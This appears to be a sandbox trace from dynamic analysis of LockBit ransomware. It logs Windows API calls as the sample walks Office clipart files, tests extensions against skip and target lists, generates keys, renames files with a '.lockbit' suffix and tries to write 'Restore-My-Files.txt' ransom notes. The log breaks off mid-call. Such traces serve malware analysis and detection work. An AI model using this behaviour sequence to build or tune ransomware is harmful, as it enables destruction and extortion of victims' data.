lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0120.895] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0120.895] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0120.895] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.lockbit") returned 72 [0120.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0120.896] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.896] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.896] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24377) returned 1 [0120.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.897] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.052] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.052] malloc (_Size=0xa6) returned 0x77d7a8 [0121.052] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0121.052] free (_Block=0x77d7a8) [0121.052] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.052] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.053] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x4752, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099148.JPG", cAlternateFileName="")) returned 1 [0121.053] lstrcmpiW (lpString1=".", lpString2="J0099148.JPG") returned -1 [0121.053] lstrcmpiW (lpString1="..", lpString2="J0099148.JPG") returned -1 [0121.053] PathFindExtensionW (pszPath="J0099148.JPG") returned=".JPG" [0121.053] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.053] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.053] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.054] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.054] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099148.JPG") returned 1 [0121.055] lstrcmpiW (lpString1="ntldr", lpString2="J0099148.JPG") returned 1 [0121.055] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099148.JPG") returned 1 [0121.055] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099148.JPG") returned -1 [0121.055] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099148.JPG") returned -1 [0121.055] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099148.JPG") returned 1 [0121.055] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099148.JPG") returned -1 [0121.055] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.055] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned=".JPG" [0121.055] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.055] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.055] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.056] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.056] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.056] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.056] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.056] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.056] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.056] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.lockbit") returned 72 [0121.056] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.057] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.057] malloc (_Size=0x40068) returned 0x3df0008 [0121.057] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18258) returned 1 [0121.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.059] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.061] malloc (_Size=0xa6) returned 0x77d7a8 [0121.061] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.062] free (_Block=0x77d7a8) [0121.062] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.062] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.062] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x11dfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099149.WMF", cAlternateFileName="")) returned 1 [0121.062] lstrcmpiW (lpString1=".", lpString2="J0099149.WMF") returned -1 [0121.062] lstrcmpiW (lpString1="..", lpString2="J0099149.WMF") returned -1 [0121.062] PathFindExtensionW (pszPath="J0099149.WMF") returned=".WMF" [0121.062] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.062] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.063] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.063] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.064] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099149.WMF") returned 1 [0121.064] lstrcmpiW (lpString1="ntldr", lpString2="J0099149.WMF") returned 1 [0121.064] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099149.WMF") returned 1 [0121.064] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099149.WMF") returned -1 [0121.064] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099149.WMF") returned -1 [0121.064] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099149.WMF") returned 1 [0121.064] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099149.WMF") returned -1 [0121.064] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.064] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned=".WMF" [0121.064] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.065] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.065] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.066] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.066] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.066] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.066] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.066] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.lockbit") returned 72 [0121.066] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0121.070] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.070] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.070] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=73214) returned 1 [0121.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.071] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.074] malloc (_Size=0xa6) returned 0x77d7a8 [0121.074] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.075] free (_Block=0x77d7a8) [0121.075] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.075] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.075] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.075] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x559a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099150.JPG", cAlternateFileName="")) returned 1 [0121.081] lstrcmpiW (lpString1=".", lpString2="J0099150.JPG") returned -1 [0121.081] lstrcmpiW (lpString1="..", lpString2="J0099150.JPG") returned -1 [0121.081] PathFindExtensionW (pszPath="J0099150.JPG") returned=".JPG" [0121.081] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.081] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.081] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.081] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.081] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.081] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.081] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.081] lstrcmpiW (lpString1=".msp", 